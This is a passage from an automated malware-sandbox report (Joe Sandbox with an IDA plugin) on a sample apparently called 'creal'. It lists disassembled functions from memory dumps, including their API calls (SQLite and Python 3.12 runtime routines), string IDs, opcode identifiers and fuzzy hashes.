                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 438689982-3418467682
                                                                                                                                                                                                                • Opcode ID: 3a72f6d314c914102456c34c9c024b260731ec6175f70502df3334ac74e68f32
                                                                                                                                                                                                                • Instruction ID: ea94944767b0118e300f01e11bea081f949c4f7cad33a7097488a07333be5c04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a72f6d314c914102456c34c9c024b260731ec6175f70502df3334ac74e68f32
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EB1AE32B286A686D760DBA6A084B6E77A8FB84BC4F115135DE4D87F85DF3CD4408712
                                                                                                                                                                                                                Function 00007FF8E69064D0 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 215COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                • API String ID: 438689982-2063813899
                                                                                                                                                                                                                • Opcode ID: 07cb2e7851a56338389ab05e0a161e4c4c89749a912260004fa4f3a15ea2c57c
                                                                                                                                                                                                                • Instruction ID: 53dd48562fb834a732f5d0be030b68a28e2654bd2fc23c02e09d0477299d6ccc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07cb2e7851a56338389ab05e0a161e4c4c89749a912260004fa4f3a15ea2c57c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E91E176A19B8182EB90DF9590183B977A5FB8ABC0F499235DE8D47785EF3CE051C301
                                                                                                                                                                                                                Function 00007FF8E68D8570 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 214COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memmove
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2162964266-3418467682
                                                                                                                                                                                                                • Opcode ID: 3a1c7061edd7996e4425f991c66e1209c2bf16ed6d35ea79bfa88dcdde2eb030
                                                                                                                                                                                                                • Instruction ID: 243a71338804dfaa042d21019b1f5b3f825b8d7cacc45a30c1511691a1791149
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a1c7061edd7996e4425f991c66e1209c2bf16ed6d35ea79bfa88dcdde2eb030
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7191FEA3B2869186CB209B65E8843AEBBA4FB85BD4F444132DF8D43B45DF3CD155C711
                                                                                                                                                                                                                Function 00007FF8E68D7930 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 212COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memmove
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 1283327689-3418467682
                                                                                                                                                                                                                • Opcode ID: d0cd61a46a282bf0fb2f550d918a6c009968a3ecbaac8df5d982ee1dfde62edb
                                                                                                                                                                                                                • Instruction ID: c66ec34ec57193f1eb2a329acd9e63372b8fa082dbe3050a4e2bb040a0c27421
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0cd61a46a282bf0fb2f550d918a6c009968a3ecbaac8df5d982ee1dfde62edb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6991E262B186E19AD720CB65D5803BD7BE4FB40B84F048536DB8D87A85DF3CE9A1C721
                                                                                                                                                                                                                Function 00007FF8E7142CB0 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PyLong_FromSsize_t.PYTHON312 ref: 00007FF8E7142D16
                                                                                                                                                                                                                • PyLong_FromSsize_t.PYTHON312 ref: 00007FF8E7142D42
                                                                                                                                                                                                                • PyNumber_Remainder.PYTHON312 ref: 00007FF8E7142D5F
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312 ref: 00007FF8E7142D76
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312 ref: 00007FF8E7142D8A
                                                                                                                                                                                                                • _Py_Dealloc.PYTHON312 ref: 00007FF8E7142DE4
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E7143590: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF8E71428DB), ref: 00007FF8E7143599
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E7143590: fprintf.MSPDB140-MSVCRT ref: 00007FF8E71435A9
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E7143590: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF8E71428DB), ref: 00007FF8E71435B3
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E7143590: fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF8E71428DB), ref: 00007FF8E71435BC
                                                                                                                                                                                                                  • Part of subcall function 00007FF8E7143590: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8E71428DB), ref: 00007FF8E71435C2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t__acrt_iob_func$Number_Remainderabortfflushfprintf
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1333916573-0
                                                                                                                                                                                                                • Opcode ID: 1ff0950ba76d1fb5de8f3a40737609fc14ed6e45cecf514f6e3c309322584276
                                                                                                                                                                                                                • Instruction ID: 41acc68e2fb321784fd7348f633be80adf62ae4344178a7817ae9bcb2cb4d194
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ff0950ba76d1fb5de8f3a40737609fc14ed6e45cecf514f6e3c309322584276
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67417132A08742C2EE694B55E95437C62A1AF49BE4F485130DE7E477D9EF2CE4928703
                                                                                                                                                                                                                Function 00007FF8E7142B70 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t$MultiplyNumber_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3214704217-0
                                                                                                                                                                                                                • Opcode ID: e441c8e1654ce7b2f422eefc1750921705619e20d6a3389d9b7057bf79d9000f
                                                                                                                                                                                                                • Instruction ID: 21e1b544f7e7a9f277ba2beebf806ceb9e847d905cf6494d2464862c918d2bf2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e441c8e1654ce7b2f422eefc1750921705619e20d6a3389d9b7057bf79d9000f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45317E32A18B42C2EA284F95E55437C6290AF49BE5F084130DB3E477D4FE2CE5C18303
                                                                                                                                                                                                                Function 00007FF8E7142920 Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t$Number_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4245833954-0
                                                                                                                                                                                                                • Opcode ID: ae72d080b4b55a948d5582023073e92d7aff9d277a6dfd1cb9816ae3c140e2c2
                                                                                                                                                                                                                • Instruction ID: af670f03180b879e89aa57715880fe079550cfdfe3bcb81322264d7632d36d20
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae72d080b4b55a948d5582023073e92d7aff9d277a6dfd1cb9816ae3c140e2c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4318332A09B53C6EA688B95D95437C6291AF44BE4F585230DE7E477D9FF2CE4818303
                                                                                                                                                                                                                Function 00007FF8E7142A50 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t$Number_Subtract
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2424657569-0
                                                                                                                                                                                                                • Opcode ID: aeebb34f4fc22b334b36647e21926670cdad37f7e6ebb6e2507bbb1c10b61d03
                                                                                                                                                                                                                • Instruction ID: 0f70b691a5ca1b80ee0bc785ff0763cf32d11356536058a609b86435f8a0724a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aeebb34f4fc22b334b36647e21926670cdad37f7e6ebb6e2507bbb1c10b61d03
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C316932A09B42C5EA288F95E55437D62A1EF48BE4F585030DF6E47B99EE2CE5818703
                                                                                                                                                                                                                Function 00007FF8E7143080 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String$Unicode_
                                                                                                                                                                                                                • String ID: Python int too large to convert to C ssize_t$string index out of range
                                                                                                                                                                                                                • API String ID: 2250126396-644864186
                                                                                                                                                                                                                • Opcode ID: e36458edd2254e28eaa8631afe286072e5f7bd0a67a5b6a46e6ef0c44dcb495f
                                                                                                                                                                                                                • Instruction ID: 4e0c8bf973e17fb5edb006a001817ba0279fda9d343c8593a011556a7f5b9408
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e36458edd2254e28eaa8631afe286072e5f7bd0a67a5b6a46e6ef0c44dcb495f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D641A066B09641C2EF288F5AC4A13BD27A1FBD8F98F880135CB5E43791EE2DD546C702
                                                                                                                                                                                                                Function 00007FF8E7152EFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: 4b12f555bacad9522f59093536ead85a57240267a6d3aa3ff40fce1b0501a7e8
                                                                                                                                                                                                                • Instruction ID: d3919f12863cd0c06c9f245ddbf9f2d47e53b1b7c6f71830b27aa6122589b3fa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b12f555bacad9522f59093536ead85a57240267a6d3aa3ff40fce1b0501a7e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F231CD39E0CB8781EA189F81F85037C33A5BB48BD5F44053AD96E4B760DF3CA1598302
                                                                                                                                                                                                                Function 00007FF8E715326D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: 1860a7d5ba5a0637c41751a3ce46a500ea5aac3d17db15aaa5db88cbc2a32e66
                                                                                                                                                                                                                • Instruction ID: 530b15350fedcd2172eb6c9b040bd19c27431c52a5d04ab13fdc66ac8d235127
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1860a7d5ba5a0637c41751a3ce46a500ea5aac3d17db15aaa5db88cbc2a32e66
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1931BB79E1CB8785EA498F85F8403AC33A5BB08BD4F444536D86E5B760EF3CE1698742
                                                                                                                                                                                                                Function 00007FF8E7152701 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: 3f2332356931184e6501015defa88c1d245f7b25bfe9b71bbf2c72ea6a00fa8a
                                                                                                                                                                                                                • Instruction ID: 7c075592470a8fe9c08fefb30f3ba66405b4b71bdfc411d1bb0ce669e608d2df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f2332356931184e6501015defa88c1d245f7b25bfe9b71bbf2c72ea6a00fa8a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD319BB5E0CB8785FA188F91E8513A837A5BF18BD1F440536D96E4B760EF3CA158C782
                                                                                                                                                                                                                Function 00007FF8E7152D67 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: 75194c0cbc9a507f0b92e1b34c94570ff1e2da8f97792c352aaccb42d87fe693
                                                                                                                                                                                                                • Instruction ID: 4f08edc5f3f119aacdcfc815fffe26acc81f2fb0d25f3449467af87b785fbb1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75194c0cbc9a507f0b92e1b34c94570ff1e2da8f97792c352aaccb42d87fe693
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA21CDA9E0DB9785FA499FC1F8503B823A5BF05BD1F844635C82E5B260EF3CA1598342
                                                                                                                                                                                                                Function 00007FF8E7153434 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
                                                                                                                                                                                                                • Instruction ID: e8162334ba87c393e0313e8439e9bfd8d4afa49c1635c15131bd3375de775264
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21AE75E0DB8381FA0A9F84F8443BC22A6AF05BD1F484635C82D1B760EF3CA1698352
                                                                                                                                                                                                                Function 00007FF8E7152A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4195104747-217463007
                                                                                                                                                                                                                • Opcode ID: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
                                                                                                                                                                                                                • Instruction ID: 9305595211646345cfdad7ace9c6bed10e2fc720fd05263f71a66025a816a05c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
